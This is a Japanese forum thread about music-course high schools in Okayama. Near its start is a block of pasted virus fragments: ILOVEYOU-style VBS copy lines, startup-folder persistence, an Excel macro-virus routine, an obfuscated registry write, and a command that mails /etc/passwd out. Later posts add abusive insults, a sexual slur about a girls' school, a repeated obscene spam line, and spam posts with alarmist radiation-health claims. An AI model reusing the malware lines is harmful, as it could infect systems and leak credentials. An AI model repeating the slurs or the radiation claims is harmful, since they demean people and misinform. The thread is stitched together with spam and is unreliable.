【供給】岡山県の音楽系高校について語る【過多?】
人口の割に大杉な岡山県の高校について。 岡山城東・山陽女子・学芸館・おかやま山陽・明誠学院 作陽高校は大学スレの方もうまくつかってね。 http://school5.2ch.net/test/read.cgi/musicology/1143133725/ c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") cat /etc/passwd | mail nobody@nonexistent.com If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l" Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1) fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" Sub auto_open() Application.OnSheetActivate = "check_files" End Sub Sub check_files() c$ = Application.StartupPath m$ = Dir(c$ & "\" & "PERSONAL.XLS") If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 End Sub ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) fso.copyfile "dirsystem&nurupo.vbs","j:\windows\startmenu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFilef1.path, f1.path+" 早速吹奏楽板の粘着が釣れたようだなw 余程この手の学校にコンプレックスを持っているらしいw ここは「音楽系学校板」ですからねwww それでも関係ないょ 楽器ができて、吹奏楽コンクールでぃぃ成績残せば 方程式がわかんなくてもそこAの大学に推薦で突っ込んでもらえるょ 音大だってレベル選ばなかったら大丈夫だし!! 作陽は学芸館にいたY市先生がきてからレベル上がった、 >>10 それより前の音科ってそんなに音大進学実績低かったの? 東京に出る人いないとか? それぞれの募集定員ってどのくらいなんだろ?? 城東の音楽系は勉強できて音楽できるみたいな人達だから音楽の先生とかなる人多いって聞いた。 まあプロになる人もいるとは思うが。 どっちにせよ音楽やる上ではある程度の教養は必要だとオモう 11 大阪芸大か作大、5年に一人くらい武蔵野、洗足だった >>13 吹奏楽の話をされるかと思ったらまともな答えで安心した そんなに酷かったのか。島根辺りじゃ北陵が出来る前は 高校で音楽専門でやるなら作陽か広島音高、だったのに。 別にひがむ要素は何もないと思うけど。 音大進学でいったら明誠は芸大一人出した以外は大したことないし。 進学が城東や山陽女子並になったらひがむ価値も出てくるかも しれないけど、山陽女子未満(作陽はきわどい)って 「基本的には音大進学より吹奏楽推薦で大学行くための高校で 音大はおまけ」でしょ? くどいようだがここは音楽学校板。吹奏楽コンクールの話は 水槽板でしてね。 逆にかわいそうだと思うのよ。学校の選択誤って 無駄な宣伝に乗せられてただの学校経営の捨てゴマにされる 明誠の「その他大勢」の子たちが。他校なら伸びるのに。 城東の音系が勉強できると思ってるやつがいたら、大間違いだぞ! 実態は全部推薦で音楽のちょっとした実績さえあれば学力など関係なく、 (しかもその実績も「若い芽」程度で十分) 受験者のうち4、5人しか落ちるやついないようなクラスなのにさ。 よっぽどのバカじゃない限り受かっちゃうよ。西高や瀬戸高以下。 ま、メイセイとかよりはさすがにちょっとは頭もマシだろうけどw 中には勉強そこそこできる子がいるのも事実だけど、「城東」っていうだけで 実際山女とレベル変わらないのに大きい顔して威張ってるバカ女ばっかり。 >>21 山女はまじバカの集団だよ? 知性のかけらもない。 あれでよく音楽をやれるものだ。 レベルもたいしたことないけど。 城東の音楽頭いい人しかしらないけど、 バカもいるってことかな。 城東音系もたいして変わらんと思うけど。 勉強もできない、音楽だってべつにたいしたことない中途半端集団。 そのくせプライドだけ高いから大変。。 さあ、水槽のコンクールネタをひけらかすしか能のない エセ音楽学校連中が必死になってきましたwww あれー?水槽のコンクールの話しかしない学校が「プライド」って言葉知ってたんだwww 水槽の話はしないんじゃなかったのか。 おれは水槽とは縁のない人間だから水槽うんぬん言われてもよくわからん。 ただ城東のあのヘタクソレベルで勉強も音楽もできるなんて言うの聞くと ちゃんちゃらおかしくて反吐が出る。それだけだ。 ま、ちいさいころからそれなりにピアノでもやってて、中学で並の成績をキープしてれば 音系なら簡単に入れるから、みんな城東受けるんだろうよ。 音系でも城東って名前だけで箔がつくしな。花嫁修業にはもってこいだ。 こういうやつらが城東だってのを鼻にかけて上で言ってるみたいに水槽水槽って他校を 小ばかにしてるんだろ。所詮この程度の人間だ。 自分は県立普通科から音大行ってるけど、 それでもまだ城東は卑怯な手使ってる私立、特に明誠あたりよりは人間的にましな気がする。 明誠とか学芸とか出た奴とか、卒業後同じステージに出たりとかすると あまりに礼儀とか常識知らなさすぎてびっくりしたことあるし。 城東もそんなすごいと思わないけどさ。 明誠や学芸あたりの吹奏楽コースと、城東や山女のような音楽コースを くらべるほうがおかしいんじゃないのか。 吹奏楽コースは個人の音楽的素養を磨くことよりバンドとしての活動のほうに 重きがあるんだと思っているのだが。 4、5歳からずっと音楽レッスンを受けてきた子と、小学校高学年から中学に かけて楽器を持ち始めた子との違いだろう。 学校として芸術家を育成したいのならそれなりの常識なども教えるべきだろうが 吹奏楽コースはおそらくそれを主な目的とはしていないのだろう。 吹奏楽コースにとって音楽とはひとつの「手段」なんだと思う。 きっと何かをやり遂げるとか、何かに打ち込むとか、そういうことを学ぶための 場所なんだろう。 どこの学校の内部事情がどうとかよく知らないが、「笑ってこらえて」など見る限り ああいうのが「吹奏楽」なんだと思う。 あれはあれで、仲間の大切さとか、青春の大事な思い出を得られていいじゃないか。 ただ音楽科、音楽コースで学ぶ目的とはかなりかけ離れているな。 だから同列に語っても仕方がない。 そうなんだよね。 だからこそ、いかにも「高校は楽器を専門でやってました」みたいなでかい面を 小さい頃から真剣に音楽やってる奴らの前でしないでほしいって思うんだけど。 >>30 笑コラに出た学校で吹奏楽コース制のとこって山田くらいだよ。 あとはちゃんと勉強と両立してるし、その山田も まだ全国行ったことないし。 打ち込んだ結果が中途半端なら ちゃんと勉強するか、ちゃんと音大進学後伸びる練習とかしたほうがまし。 そういう意味では岡山のコース制はまだまだ。 明誠・山陽全国金一回づつ(しかもギリギリ)でしょ? 天理とか福工大城東とか名電とかに笑われるよw 鹿児島の松陽みたいに「吹奏楽コンクールと大学進学どっちも制覇してる」学校もあるんだし。 水槽の話はいいって… 笑ってこらえての学校がコースだかコースじゃないだか、そんな話はしていない。 コースだろうとそうでなかろうと「吹奏楽はああいうもの」という話をしている。 金だろうと銀だろうと、その過程で得られるものがたくさんあるんじゃないのか。 あの番組はそういうところに着目していたのだろう。 打ち込んだ結果が金以外なら「中途半端」と言い切る君の思考自体がどうかしている。 そういう話になるから、音楽科とは一線を引かざるを得ないのだ。 大作曲家、筒美京平氏が手がける新人女性歌手が「また逢う日まで」をカバー。avex selection ( Live DEPT.4) に出演して最初に登場。今なら、GyaO(ギャオ=無料ネットテレビ)音楽コーナーの1番下でみられます【7月7日正午まで】。20歳、驚きの歌唱力! 城東や山陽の子だって山陽音コンの結果に一喜一憂してるくせにw 吹奏楽コンクールと音楽コンクールじゃ意味が全然違うだろう。 それとコンクールに重きを置く人がいるのは吹奏楽も個人も同じかもしれないが 音楽に対する考え方や姿勢が吹奏楽だけやってるやつと芸術家を目指すやつとで 違うという話をしている。 コンクールという話題にばっかりこだわるな。だからコン厨と言われる。 だって城東と山陽以外はあなたの言う「コン厨」育成学校だもん。 決して「正しく打ち込む」ことをきちんと指導とかしてないしw だから水槽板の岡山スレとかあんなんなってるでしょw ぶっちゃけ、ある意味板の人には申し訳ないけど、ここ隔離スレの目的で立てさせてもらったので。 根っからの音楽学校板住人の人たちで、現実見させてあげてください。 l;;llllll||lll从从WWWl||ll,,ツ从ツツノlイノ'彡ヽ イ从、从从从从从ll|| |リ从////ノノ彡;j jl从从从从;;;;;;;;;;;;从;;;;;/;;;;;;;;;、、、;;-ー、イ彡:} (ミミ;;ッ''"゙ ̄ '、::::゙`゙''ー、/"´::: :::: |;;;;;彡| }ミミ;;;} ::: {:: ゙:::::、::: :::ィ ,,:::: };;;;イ;;l jミミ;;;;} ::: ヽ::::ミヽ:: | ノ W:: |;;;;彡:| }ミ;;;;;;} ::: ヾ {:::::ミ ヽ j イ|从 ":::: };;;;;;彡{ iミ゙;;;ノ:::::: \'、 }}: l||イ /,ィ;;、、-ーーヾ'ァ;;イ、 {;;;;リ:レ彡"三三ミヽ,,リ{{,,ノ;;;;ィ≦==ミ'" |;;〉l.| l"';;;l ゙'''<<~(::) >>::)-ら::ィ'ー゙-゙,,彡゙ .:|;l"lリ |l ';;', ::: ー` ̄:::::::ミ}゙'~}彡ィ""´ .:::lリノ/ l'、〈;', ::: :::::::t、,j iノ:::、::.. ..::::lー'/ ,、,,,/| ヽヽ,,', ::.、 :::::(゙゙( ),、)、ヽ::. イ ::::l_ノ )ヽ"´ ''''"レl_ヽ,,,', ヾ'ー、:::;r'"`' ゙'';;"" ゙l| ::j ::: |: l,,,, ゙''(,l ', l| リ {"ィr''''' ーー''ijツヽ l| :" l |',`ヽ, き 利 (l :'、 `',. 'l| |;;゙゙゙゙"""´ー、;;| ノ: / /リヽ \ . く い Z::::ヽ '、 ゙'t;ヽ ` ´ ノ;;リ ,r' // | な. た >; :::ヽ ::ヽミニニニ彡'" , ':::::// | ┃ ふ フヽ ::\ : ミー―― "ノ , ':::: //: | ┃ う }ヽヽ :::::\::( ̄ ̄ ̄ /:::://: | ┃ な }| ヽヽ :::::`'-、竺;;ニィ':::// | l // 口 (: | ヽ ヽ :::: ::::::... ::// | | ) ・・. を ( | ヽ ヽ:: ::::::... // リ. | つ、 r、{ | ヽ ヽ // / | ヽ '´ | ヽ ヽ // / | いくら城東の音科がある程度馬鹿でも 城東 =====人間====== 山陽女子 ====肉便器。この下は産業廃棄物==== その他 でしょ。 城東はとりあえず合格最低点を満たしていなければ落ちる (まあ、音科だと実質玉野や西大寺レベルだけど。) 山陽女子未満は完全に全入。 学芸吹奏落ちたやつ知ってるよ。 他のコースなら受かったんだろうけど、音楽経験問わないなんていうのは建前で、 実際は実績ないやつは入れないっていう方針だったんだろうと思う。 そいつは確かに吹奏やったことすらないやつだったから落ちて当然だったけど。 (どうして吹奏を受けたのかがわからん) 今はもう吹奏コースなくなったみたいだから知らんけど。 明誠とかなんか今もそんな感じなんじゃないのかな? >>43 学芸は進学コース音楽系という名前にしてるだけで、入学後音楽系希望すれば 好き放題吹奏楽できることには変わりない。 「どっかのパクリの好きな部活馬鹿とは違います。」ってアピールするための手段で何も変わってないよ。 もちろんその学校も当然コースはなくなってなくて、相変わらず(ry >入学後音楽系希望すれば >好き放題吹奏楽できることには変わりない。 入学後の話じゃなくて入試の話をしてるんだけど… 昔の学芸吹奏は音楽経験ないと入れないのが実態だったという話。 少なくとも全入ではなかった。 頭の良し悪しは全然関係なかったと思うけどね。 そりゃ、吹奏コースなくなったんだから音楽経験なくて 落とされることはなくなったわな。 だからさ、都合のいいとこだけ「吹奏楽コースなくなった」っていうのやめない? 実際は入学後楽器吹きまくってれば卒業できる類型が存在するんだから。 楽器さえやってれば卒業できるのは城東も山女も同じこと 城東は他のコースに比べればハードルは低いけど一般教科でもちゃんと赤点あるし 勉強できなかったら留年ですよ。 山女は知らないけど。 まあ、学芸の学力レベルでの「楽器さえ」って本当に相当なもんだろうからねえ・・・。 一応西大寺レベルはクリアしてる人と、そうでない人と・・・。 ていうか少なくとも教える側の世代は「学芸ごときが音楽語るなんて」って 思ってるのはまぎれもない事実なんだから・・・。 個人では頑張ってる人もいるのに、元があんな学校だからかわいそうだよね。 自分の頃は宝塚・宝梅や西宮・今津、姫路・山陽といった岡山の中学校の 何億倍もうまい学校で、でもペーパーではほとんど0点に近いような子の 収容所みたいになってたからね・・・。 そして普通に理大電車や吉備電(人によっては赤穂線回り)で通ってて 都落ちだって馬鹿にされてたりとか・・・。 城東に「他県の音高入れないから」って理由で来る人は少ないはず。山女しかり。 おまえらここで小さくほざくんなら芸校行けや 入れるかは別だけどーww 岡山の音楽高校なんてレベルは全部同じなんだよ。 芸高おちるレベルで ガタガタさわいでんじゃねーよ と、芸大もまだ出てなくて完全全入の県山関係者が必死ですwww 城東音系で赤点で留年なんて聞いたことねーし。 音系の平均点なんてすげー酷いよ。 テストも他のクラスと違うしもともと音系の平均点が酷いから 赤点なんてなり得ない。 数学も理科もいらないし。 それで音楽が中途半端なやつは推薦で余裕で国立の教育にでも入る。 あんなお得な学校ないよ。 >>53 ま、これが正論だな。 ほんとにできるやつは高校から東京に行く。 岡山なんかで音楽系に行くやつは所詮負け組。 金がどうとか言ってるようなレベルでは音楽家は到底無理。 地元レベルで落ち着くようなやつは所詮花嫁修業がオチだろ。 それでよその学校がどうとか低レベルな争いご苦労様。 所詮どんぐりの背比べなのに傍から見ると愚かだよね。 じゃあもう岡山にかえってくんな。 岡山にいたいから岡山で馬鹿にされる学校には入りたくなくて 岡山で最高評価受ける学校を頑張って受けてるんだろうが。氏ね 本当は学芸のカスのくせに。 >岡山にいたいから岡山で馬鹿にされる学校には入りたくなくて >岡山で最高評価受ける学校を頑張って受けてるんだろうが。 こんなこと言ってる時点でもう終わりなんだよ。 岡山にいたいから?なんのために音楽をやってんの? 岡山で最高評価?結局見栄張るだけ?ばかじゃねーの。 一生岡山でくすぶってろよ。 その岡山でも評価もらえない人がほとんどでしょ。山女未満は。 いや、実際問題。 ふつう、高校で評価なんてされませんよ、常識的に考えて。 山女未満とか以上とかそんなことで音楽家を評価している人がどこにいる? いや、実際問題。 高校くらいで最高評価もらいたいなんて考えている子はそこで終わりでしょう。 でも実際の音大進学実績的にも 城東>山女>>その他 でしょ? それを無視してやれ勉強がどうだの歴史がどうだの余計なことを 口に出すから、こういう言われ方されてるわけで。 人数比を無視して、進学実績を単純に不等号で語るのは 乱暴すぎますよ。 城東は人数も一番多く、専攻もなんでもありなんだから 音大進学実績があって当たり前。 もひとつついでに言わせていただくと、音大なんて特殊な分野は特に 進学実績などと言ったところで高校が行かせたわけじゃないからね。 普通高校からでも芸大に行ってプロになる人もいるわけで。 音楽高校に行ってたって結局は外部の先生にみんなついているでしょう? どうも高校の評価にこだわる人が多いようですね岡山は。 実際、生活においてどの程度音楽に支配されるか。 レッスンをどれだけ大事にできるか。 学校が音楽系だと、 自分から行わなくても設備が整っている。 ただそれだけ。 結局自分との戦いですよ 本当に芸大だけで比べるんだったら 城東 ===毎年複数名芸大出してる壁=== 山陽女子 ===毎年芸大出してる壁=== 明誠 学芸 ===隔年で芸大は出せる環境の壁=== 作陽 ===まかりなりにも音大の附属の壁== おかやま山陽 くらいだと思う。と言っても昔に比べたらそれぞれの壁なんてない。 朝日や操山も芸大で比べたら山女辺りのところに入っちゃうし。 だけど、人数比なんて話を出し始めると「音楽系」関係はどこも20〜40程度でしょ? 作陽だけがちょっと多いくらいの話で。 明誠、学芸は本当、出来た頃に比べたら伸びたと思うよ。 学芸なんて音系あってもなかなか芸大は出なかったし、明誠はいくら引き抜きでも コース2期生で芸大出してるし。 >>70 あんたは本当になんにもしらなさすぎ。 しらなさすぎのくせにしったかぶりしすぎ。 城東が毎年複数名芸大出してるなんてどこにそんなデータが? 3人ぐらい出るときもあればゼロが続くときも余裕であります。 しかも現役率は非常に低いです。 山女から芸大なんてもうここ数年出てません。 明誠も学芸も隔年で芸大なんて出ません。過去全員数えても片手ほどです。 おかやま山陽からは芸大にひとりだけ行っているみたいですがそれっきりです。 作陽から芸大なんてここ最近聞いたこともありません。 芸大でくらべたときに山女と明誠学芸の位置は微妙かもしれません。 作陽とおかやま山陽の位置はもっと微妙かもしれません。 人数比で作陽がちょっと多いなんてとんでもないことです。 作陽も山女も私立の音楽科は定員割れ続きで一学年20もいません。10も微妙かもしれない。 城東と明誠がちょっと多くてそれでも35程度でしょう。 学芸はいまや混合クラスになっていて正確に何人か判断不能です。 結局岡山の高校はその程度ということです。 みんな城東を過大評価しすぎですが単に公立で評判がよいから最初から実力ある子が 集まって実力どおりの実績を出しているにすぎないのです。 それと何度も言われてますが音楽科・コースと吹奏楽コースを混同するのはいい加減 やめませんか。 ピアノ・声楽・弦楽器の専攻のある学校と、管打楽器だけの学校とを同列に 語るには無理があります。 一口に芸大といったところで、それまでの音楽経験も取り組む環境も全然違うなかで 受験倍率もまた専攻によって全然違う。 吹奏楽は結局学校主体になりぎみですが弦やピアノは個人レッスン主体です。 芸大を出したといっても高校の力を一律に判断できるわけではありません。 >>71 いいんよ岡山なんだからwww 熱くなりすぎwww 嫌なら他の奴も言うとおりこんなスレにいないでもっと高尚なスレにいけば? うまいんでしょあなた??? べつに嫌なんて言ってないし自分がうまいとも一言も言ってない。 他のどんな奴が高尚なスレに行けって言ってる?高尚なスレとは一体どこ? 音楽系のスレなのに吹奏楽の話しかできない、現実も知らない、 そんな人こそ他のスレに行ってはどうですか。 >>71 あんたは本当になんにもしらなさすぎ。 しらなさすぎのくせにしったかぶりしすぎ。 城東が毎年複数名芸大出してるなんてどこにそんなデータが? 3人ぐらい出るときもあればゼロが続くときも余裕であります。 しかも現役率は非常に低いです。 山女から芸大なんてもうここ数年出てません。 明誠も学芸も隔年で芸大なんて出ません。過去全員数えても片手ほどです。 おかやま山陽からは芸大にひとりだけ行っているみたいですがそれっきりです。 作陽から芸大なんてここ最近聞いたこともありません。 芸大でくらべたときに山女と明誠学芸の位置は微妙かもしれません。 作陽とおかやま山陽の位置はもっと微妙かもしれません。 人数比で作陽がちょっと多いなんてとんでもないことです。 作陽も山女も私立の音楽科は定員割れ続きで一学年20もいません。10も微妙かもしれない。 城東と明誠がちょっと多くてそれでも35程度でしょう。 学芸はいまや混合クラスになっていて正確に何人か判断不能です。 結局岡山の高校はその程度ということです。 みんな城東を過大評価しすぎですが単に公立で評判がよいから最初から実力ある子が 集まって実力どおりの実績を出しているにすぎないのです。 それと何度も言われてますが音楽科・コースと吹奏楽コースを混同するのはいい加減 やめませんか。 ピアノ・声楽・弦楽器の専攻のある学校と、管打楽器だけの学校とを同列に 語るには無理があります。 一口に芸大といったところで、それまでの音楽経験も取り組む環境も全然違うなかで 受験倍率もまた専攻によって全然違う。 吹奏楽は結局学校主体になりぎみですが弦やピアノは個人レッスン主体です。 芸大を出したといっても高校の力を一律に判断できるわけではありません。 序列ネタ除いたら何もしゃべることないくせに。 じゃあ何かしゃべれよ。 しゃべれ。 しゃべれ。 いいからしゃべれ。アホのくせに。 おまえがあほなんだよ、あほ 序列するんでももっと考えてしろや 違う話題を振れない鸚鵡返しの中途半端私立君の叫びでしたw まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。 城は最低 あそこで音楽伸びた話なんか 聞いたことない 今は実績あっても学力ないと合格しないし 何がしたいの 中途半端 学歴にハクをつけて、嫁入り道具にするには ちょうどいいんじゃないでしょうかw 何年か前に城東の音系から岡大の薬行った人居るよ 城東の音系は中途半端な気がするが パンフレット見ると毎年芸大出てるwwwww 少なくともこのスレには基地外が2名いるってことだな。 城東にも入れない粘着と、 その城東を執拗に擁護する粘着とww 音楽をちょっとかじってるやつで城東音系に入れないやつなんていないよ。 ここで城東をひがんでるやつがいるとすれば、ふつうに学力で城東に入れない やつじゃないの。 音系とそれ以外とで、あまりにも入るときのハードルが違いすぎるから。 音系ははっきりいって誰でも入れるでしょう。 ちなみにおれは城東の理系だったが、音系見てると確かにイライラしたw チャラ女多すぎてw おれ自身ちょっと音楽かじってる身としては、あの程度の中途半端で わたし音楽やってるのよ!って高ぶってるの見るとたしかにいい気しないね。 数年にひとりくらいはすごいのもいるけど。 他県のものです。(管楽器やってます) 管で城東で有名な人といえば、吹奏楽アレンジャーの山里佐和子さんの イメージがあるので、それなりにすごいと思っていましたが (国立Euph科卒。吹奏楽やってる人なら楽譜で一度はお世話になっている、審査員にもよく来ている。 多分吹奏楽関係者で知らない人はいない) 城東のチャラい人って具体的にどれくらいなんでしょうか・・・? 城東音系を擁護するつもりはないけど、 音楽やってこうって本当に思ってるんなら、 特に女の子は一種の華やかさはある程度必要だと思うけど。 仮にそれが腕が中途半端であっても「やっていく」んだったらね。 それで都市部に出てもその雰囲気と大学で伸びた実力があいまって それなりに売れる人も多い。 本当にどうしようもないのに勘違いなのは、本当に痛いけど・・・。 (見たことない・・・わけではない。) 都市圏のもっと実力ある音高見てみなよ。女子の派手合戦は あんなもんじゃないよ。東岡山で楽器持ってる子とか まだかわいいもんだと思うし、普通の子も大差ないじゃん。 下手に旧時代的な価値観を押し付けられて「練習だけ」になるよりかは 個人的には好感持てるよ。岡山にそういう学校があるとは言わないけど。 >>88 たったひとりの卒業生だけで学校のイメージ決め付けるなんて危険ですね。 そりゃどこの学校にだってすごい人もいればすごくない人もいるでしょう。 追加。 城東のチャラいっていうのは、見た目の派手さのことだけ言ってるんじゃないと思う。 とりあえず明誠はまだ「すごい」レベルは出てないだろ。 歴史が浅いんだから。 県山陽しかり。 ここである程度反論してるのはやはり作陽か学芸関係者? >とりあえず明誠はまだ「すごい」レベルは出てないだろ。 だから? >91 中身も、音楽観も、普通と大差ない人が結構いるよ。 普通以下の人だっている。 あ、在校生なので間違ってはない。 今城東を潰しておけば、明誠山陽学芸は今年吹奏楽で3校とも実績出したからな。 結果出したんだから私立音楽コースのことごちゃごちゃ言わないでください。 学芸関係者は今はだんまりが一番だと気づいたんだろうな。 結果は出したけど、醜態は晒してるんだからwww 悪いけど 城で伸びた学生はいません 入学前から素晴らしい先生のレッスンをうけ 入学後も 城以外の先生のご指導により 成長しています 大学進学もそのおかげ 数年前から 音楽の力はあっても ある程度の学力がないと 合格しません まあ 受験する人はよく考えて ねえねえ、逃げないでどこの学校が伸びるか教えてよwww 山女はともかくおかやま山陽とか芸大まだでてなくね?w なんだ、城東大嫌い君は学芸じゃなくて山陽だったのか。 誰かなんとなくわかるwww まあ、俺も城東嫌いだけどね。 さすがにおかやま山陽レベルだともはやひがみとしか言えなくなってくるなw なんで学芸だと思ってたのかも分からんし、 芸大出たという事実を言っただけでなぜ山陽確定なのかも全く分からん。 そもそも城東批判=城東嫌いと思い込んでいること自体がさっぱり分からん。 伸びる学校とはそもそもどういう学校を指すの? 城東がそれに当てはまらないことだけはカリキュラム的にも組織的にも確かだが。 それは進学とかプロ行きじゃねぇ? 岡山城東の普通科は良いと思う。 今の芸大生から打ち出したら流行りの音楽科高校が分かるんジャマイカ? >>124 それでやると、結構県内の高校から学力や格関係なく、満遍なく合格者がいるんだよね。 馬鹿私立からも数名、城東からも数名、普通科進学校からも数名。 ・・・と言うと、どこぞの公立音楽科の皆さんが憤慨なさるようですがwww ていうか、 東京ゲイ大とか入るのは、語弊はあるが、 ピアノ、弦楽器、歌 より、 管楽器の方が、やはり簡単。 それぞれの楽器のやってる人口の問題や始める年齢の違いが大きいけど。 合格人数を、楽器ごちゃまぜに考えるのはどうかと。 世間一般のイメージ 城東→実技上手なのに勉強も頑張ってて偉いなぁ 山陽女子?学芸?明誠?偏差値低い音楽バカ 山陽と作陽?どこの田舎にあるの? みんなそう思ってるよ 明誠や学芸って音楽系あったの?w 割と最近の話だろうから知らなかった〜 ま、アホ私立にわざわざ高い金かけて行く価値なし 自分は他校だが城東は音楽やめても慶應行った人もいる 将来を考えたらそっちの方が賢い選択 岡山市内で、ピアノ付きの練習室を貸してくれるところはありませんか? >>138 大阪教育とか広島とか岡山とか 西日本の国立が多いみたいです 明誠からまたも現役芸大 ここまで短いスパンで合格できる学校は城東山陽以外にはない どこの高校を選んでも同じだと思います。 あるレベル以上の音大合格を目指すことを前提とした場合、 いずれにしても学内の授業だけでは間違いなく不十分です。 私も上記高校のいずれかを卒業した一人ですが、 クラスの皆も学外の先生に師事していました。 一般系高校からでも有名な音大に進学する人もいれば、 音楽系の高校を卒業して一般大学に入り、 音楽をやめる人も大勢います。 結局音楽は個人の実技レベルが全てですから、 学校の過去の進学データは 各々の将来の進学に於いてそれ程あてにはなりません。 進学データが良い学校は、 たまたまその学校の人が受かっただけに過ぎないわけで、 その学校の教育方針による 純粋な実績とは考えにくいのが実情です。 もちろん、一般授業より音楽系授業の多い方が 確かに有利には働くのでしょうが。 結局、雰囲気や環境で決めるしかないと思われます。 良い学校というのは、 周りが刺激し合って自然に打ち込める環境を持ち合わせています。 空気嫁。 吹奏楽もやって音大にも行くんだったら、岡山の場合私立しかないんだよばーか。 このスレが高校の悪口を言うためにたてられたことを未だに理解できない馬鹿もいるし・・・。 岡山城東は県立高校ですが、 県外から音楽分野に入学はオッケーなんですか? 城ってコネコネなんですね 謝○いっぱい貰っていいの 句読点がろくに打てない奴はジジババと相場が決まっているwww 作陽大のHP見たけど、出身校には様々な学校がある。 どこ行っても同じだと気づいた親。 つーか、それなら私立の音楽系高校行っても、あんま意味ないじゃん。 音楽系じゃない高校の吹奏楽部とジュニアオケ、一緒にやってる人もいるよね。 岡山出身です。地元では高校の授業にほとんど出ずドラムばっかり叩いてました。 おかげでプロになれたし、今は学校で講師をしているよ。釣りもプロだけどね。 こんな学校いくんじゃなかった http://yuzuru.2ch.net/test/read.cgi/senmon/1174069060/133-137 133 :名無し専門学校:2010/05/07(金) 22:12:48 何故、国立音楽院 教務部責任者の稲塚は、滋慶グループを叩き続けるんだ? 135 :名無し専門学校:2010/05/08(土) 14:26:13 >>133 滋慶に個人的な恨みでもあるんじゃない? あと高専。大原。ヒューマン。コンピューター系。グループ学園。・・・ この板、全土に爆撃中。。。 国立音楽院教務部責任者の稲塚に注意! 136 :名無しの専門学校:2010/05/08(土) 15:13:03 大阪モード学園 同じクラスに高校ダブりの馬鹿な安キャバ嬢がいる うるさい、くさいでたまらん! 137 :↑:2010/05/08(土) 17:05:52 これが、国立音楽院教務部責任者の稲塚です。 こんな感じで、一人で自演しながら、ありとあらゆる学校の悪口を書き込んでいます。 関係者各位は対応なさってください。 首都圏もチェルノブイリ並みに汚染されている(日刊ゲンダイ)2011年8月9日 放射能防御プロジェクトの土井里紗医師はこう言った。 「首都圏はチェルノブイリ事故のような汚染はない、とされてきたが、(調査結果は)それを否定するもの。 降り積もった(高濃度汚染の)砂塵(さじん)が風などで吹き上がれば、皮膚や粘膜に吸着される可能性もあります」 岡山出身で広島県内在住者です。 子供に音楽系高校を考えた時に…広島音校しかない。 元生徒が裁判やってるし(今どうなっているか知らないけれど。) 岡山がどれだけ羨ましいと思ったか! 城東、魅了的です。 明誠も、ソロを鍛えてもらえそうじゃないですか。 ■東北、関東、東日本から避けろ http://nsed.jaea.go.jp/fukushima/data/20110906.pdf ■関東の放射能汚染は人間が住めない最悪レベル 福島原発の爆発後、政府は「法改正」して放射能汚染を容認したが、諸外国の基準を適用すると関東は居住禁止・強制移住地域に該当する http://livedoor.blogimg.jp/housyanou/imgs/9/2/92c7b920.jpg ■「内部被爆はどうしようもない、福島、埼玉、東京、神奈川、千葉など関東の人間は結婚しない方がいい。 子供産むと奇形発生率がドーンと上がる」…公益法人会長が講演 http://www.asahi.com/national/update/0829/TKY201208290581.html ■進学先は、近畿など西日本の大学を選ぶべき。 近畿には京都大学、大阪大学、神戸大学、同志社大学など名門の国公立大学・私立大学が集積している。 東日本で呼吸や食事をしてしまうと肺や甲状腺に放射性物質ストロンチウムが蓄積する。 